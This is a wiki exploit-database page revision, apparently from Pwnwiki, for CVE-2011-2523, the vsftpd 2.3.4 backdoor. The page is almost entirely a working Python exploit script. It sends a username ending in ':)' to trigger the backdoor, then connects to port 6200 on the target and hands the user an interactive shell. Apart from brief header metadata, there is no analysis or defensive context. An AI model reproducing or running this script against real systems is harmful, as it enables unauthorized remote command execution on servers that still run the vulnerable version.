Pwnwiki: Created page with "==EXP==

 # Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution # Date: 9-04-2021 # Exploit Author: HerculesRD # Software Link: http://www.linuxfromscratch.org/~thoma..."

2021-04-13T02:09:15Z

Created page with "==EXP== <pre> # Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution # Date: 9-04-2021 # Exploit Author: HerculesRD # Software Link: http://www.linuxfromscratch.org/~thoma..."

New page

==EXP==
<pre>
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link: http://www.linuxfromscratch.org/~thomasp/blfs-book-xsl/server/vsftpd.html
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523

#!/usr/bin/python3

from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')
exit(0)

signal(SIGINT, handler)
parser=argparse.ArgumentParser()
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host = args.host
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"\n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"\n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
</pre>

CVE-2011-2523 vsftpd 2.3.4 後門命令執行漏洞 - Revision history

Pwnwiki: Created page with "==EXP==
# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution # Date: 9-04-2021 # Exploit Author: HerculesRD # Software Link: http://www.linuxfromscratch.org/~thoma..."